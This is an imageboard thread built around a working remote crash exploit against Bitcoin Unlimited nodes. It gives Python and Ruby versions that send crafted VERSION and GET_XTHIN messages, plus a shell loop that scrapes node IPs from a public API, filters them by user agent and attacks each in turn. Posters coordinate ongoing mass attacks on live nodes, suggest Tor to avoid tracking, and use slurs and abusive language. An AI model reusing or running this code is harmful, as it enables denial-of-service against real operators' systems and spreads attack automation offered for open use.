[Python]Remote Crash 0day Bitcoin Unlimited all versions

[Code]
#!/usr/bin/env python
import binascii
import socket
import time
import sys
import argparse

BUFFER_SIZE = 1024
VERSION = binascii.unhexlify("f9beb4d976657273696f6e00000000006600000023c22f307e110100000000000000000040dbc75800000000000000000000000000000000000000000000ffffad61bfae208d000000000000000000000000000000000000ffff0000000000002747310f6a3c90b9102f5361746f7368693a302e31332e312fbff9060000")
GET_XTHIN = binascii.unhexlify("f9beb4d96765745f787468696e00000050000000738a98c80200000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000000000120000000000000001")

if len(sys.argv) > 2:
TCP_PORT = int(sys.argv[2])
TCP_IP = sys.argv[1]
elif len(sys.argv) > 1:
TCP_PORT = 8333
TCP_IP = sys.argv[1]
else:
print "Usage: %s ip [port]" % sys.argv[0]
exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(VERSION)

data = s.recv(BUFFER_SIZE)
time.sleep(1)

s.send(GET_XTHIN)
time.sleep(1)
s.close()

print "received data:", data

Other urls found in this thread:

coin.dance/nodes/unlimited
twitter.com/NSFWRedditVideo

>python 2

exploit is still an exploit you can port it if you want

Total noob here. What would be the point of crashing people other than upsetting them?

Political speech, BU nodes want to hardfork

BU is garbage statefunded by China and promoted by CIA-bribed Gavin Andressen. Serves them well, the idea of handling a 20 billion dollar project into a bunch of retards was laughable from day one. Kill it with fire, Core devs win another day.

So I take you you are running a copy now too.

Can we reach 0 nodes?

Anyway, isn't it already patched?

How would you filter all the Bitcoin unlimited nodes, I'm trying to automate the script a bit better

curl -H "Accept: application/json; indent=4" "bitnodes.21.co/api/v1/snapshots/latest/" >> nodes.json

curl -s -H "Accept: application/json; indent=4" "bitnodes.21.co/api/v1/snapshots/latest/" | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"


Will list all IPs, you still need to filter by useragent

Winfag here, with 0.14.0 you can easily select a bunch of nodes and ban them, I have no idea about the command line to automate it tho. There should be a command line that you can use in the console.

Banning a node is not what we want to do, we want to crash BU nodes.

So far I have this script
for ip in $(curl -s -H "Accept: application/json; indent=4" "bitnodes.21.co/api/v1/snapshots/latest/" | grep -i -B 2 "unlimited" | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)")
do
python2 bitcoinunlimited.py $ip
done

coin.dance/nodes/unlimited

roger + jihan on suicide watch

lets keep attacking

ps: this would have been epic after ver sold his BTC coins for BTE (assuming he actually would do that after the fork)

Your script tries to attark 1.0.1.1 a lot.
FIX IT NIGGA

bitcoinunlimited.py
#!/usr/bin/env python
import binascii
import socket
import time
import sys
import argparse

BUFFER_SIZE = 1024
VERSION = binascii.unhexlify("f9beb4d976657273696f6e00000000006600000023c22f307e110100000000000000000040dbc75800000000000000000000000000000000000000000000ffffad61bfae208d000000000000000000000000000000000000ffff0000000000002747310f6a3c90b9102f5361746f7368693a302e31332e312fbff9060000")
GET_XTHIN = binascii.unhexlify("f9beb4d96765745f787468696e00000050000000738a98c80200000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000000000120000000000000001")

if len(sys.argv) > 2:
TCP_PORT = int(sys.argv[2])
TCP_IP = sys.argv[1]
elif len(sys.argv) > 1:
TCP_PORT = 8333
TCP_IP = sys.argv[1]
else:
print "Usage: %s ip [port]" % sys.argv[0]
exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(VERSION)

data = s.recv(BUFFER_SIZE)
time.sleep(1)

s.send(GET_XTHIN)
time.sleep(1)
s.close()

print "received data:", data


attack.sh
for ip in $(curl -s -H "Accept: application/json; indent=4" "bitnodes.21.co/api/v1/snapshots/latest/" | grep -i -B 2 "unlimited" | awk 'NR % 4 == 1' | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)")
do
echo "Attacking Bitcoin Unlimited Node on $ip"
python2 bitcoinunlimited.py $ip
done

Running because fuck shit software
Thanks anons

Ruby port for the python haters.

require 'socket'
require 'time'

arguments = ARGV
BUFFER_SIZE = 1024
VERSION = "f9beb4d976657273696f6e00000000006600000023c22f307e110100000000000000000040dbc75800000000000000000000000000000000000000000000ffffad61bfae208d000000000000000000000000000000000000ffff0000000000002747310f6a3c90b9102f5361746f7368693a302e31332e312fbff9060000".unpack('H*')
GET_XTHIN = "f9beb4d96765745f787468696e00000050000000738a98c80200000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000000000120000000000000001".unpack('H*')

if arguments.length > 2 then
TCP_PORT = arguments[2].to_i
TCP_IP = arguments[1]
elsif arguments.length > 1 then
TCP_PORT = 8333
TCP_IP = arguments[1]
else
puts("Usage: #{arguments[0]} [IP ADDRESS] [PORT]")
exit
end

socket = TCPSocket.open(TCP_IP, TCP_PORT)
socket.print(VERSION)

response = socket.recv(BUFFER_SIZE)
sleep(1)

socket.print(GET_XTHIN)
sleep(1)
socket.close()

looks like nodes are slowly getting updated

time to find out how to fuck up the new version

bump for mischeif

Python dev here use this updated script. It adds a socket timeout to prevent blocking.

[/code]
#!/usr/bin/env python
import binascii
import socket
import time
import sys
import argparse

BUFFER_SIZE = 1024
VERSION = binascii.unhexlify("f9beb4d976657273696f6e00000000006600000023c22f307e110100000000000000000040dbc75800000000000000000000000000000000000000000000ffffad61bfae208d000000000000000000000000000000000000ffff0000000000002747310f6a3c90b9102f5361746f7368693a302e31332e312fbff9060000")
GET_XTHIN = binascii.unhexlify("f9beb4d96765745f787468696e00000050000000738a98c80200000000000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000000000120000000000000001")

if len(sys.argv) > 2:
TCP_PORT = int(sys.argv[2])
TCP_IP = sys.argv[1]
elif len(sys.argv) > 1:
TCP_PORT = 8333
TCP_IP = sys.argv[1]
else:
print "Usage: %s ip [port]" % sys.argv[0]
exit(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((TCP_IP, TCP_PORT))
s.send(VERSION)
[/code]

does this only affect bitcoin unlimited, or bitcoin core in general?

Bitcoin Unlimited only

Anyone else still nuking nodes down?

Most of them appear to have been updated to the patched version

there used to be 700 are we still keeping the unpatched one's down?

Eh, I guess I am not motivated to do this without financial gain out of it, also,

>scared might get tracked

>0day

not really 0day when you publish the source, and they patch it within a few hours.

Bitcoin prices can drop if there is a hardfork.
Bitcoin core staying popular protects your investment in bitcoin.

Use tor to send the packets

so youre saying I can lower price of bitcoins, invest, then sell when they go back up?

>use tor to send the packets

Hmm, gives me a reason to fire up my RPI tor proxy AP.

If you can force a hardfork, and how do you know it will go back up and not stay down forover

oh well there goes my motivation.

You realize nuking these nodes keeps the hardfork away, by not running it you risk losing money

I don't have investment in BTC.

catch up slacker

>tfw i dont have grand to drop in BTC, tfw I only have 200 dollars to my name.

you can buy .00000001 of a coin if needed.
Bitcoin unlike stocks are dividable.

>I cant buy BTC because you can only buy entire BTC units
>2017
kys

Yes it is.

Bitcoin noob here.
What's the VERSION thing do?
And what IP/port am I supposed to give it?

here your (you)
2/10 making me reply.

refer to this post here. "attack.sh" grabs the ip for you, then gives them to "bitcoinunlimited.py"

lol fucking script kiddies
Learn a real programming language with strong static typing.

the botnet has already been patched, nodes are at an all time high

how do we keep fucking with them?

>attark

Python is strongly typed